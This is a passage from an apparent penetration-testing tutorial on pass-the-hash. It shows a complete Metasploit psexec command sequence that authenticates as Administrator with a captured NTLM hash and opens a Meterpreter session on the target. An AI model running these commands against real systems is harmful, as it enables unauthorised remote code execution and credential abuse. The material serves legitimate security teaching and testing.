Passing the hash
The pass the hash technique allows us to authenticate to a remote server or service by passing the hashed credentials directly without cracking them. This technique was first published on Bugtraq back in 1997 by Paul Ashton in an exploit called NT Pass the Hash.
How to do it...
To perform a pass the hash attack, we can use the Microsoft Windows Authenticated User Code Execution exploit module and use the previous capture hash instead of the plaintext password:
msf > use exploit/windows/smb/psexec msf exploit(psexec) > set RHOST 192.168.216.10 RHOST => 192.168.216.10 msf exploit(psexec) > set SMBUser Administrator SMBUser => Administrator msf exploit(psexec) > set SMBPASS aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b SMBPASS => aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b msf exploit(psexec) > exploit ... [*] Sending stage (179267 bytes) to 192.168.216.10 [*] Meterpreter session 1 opened (192.168.216.5:4444 ...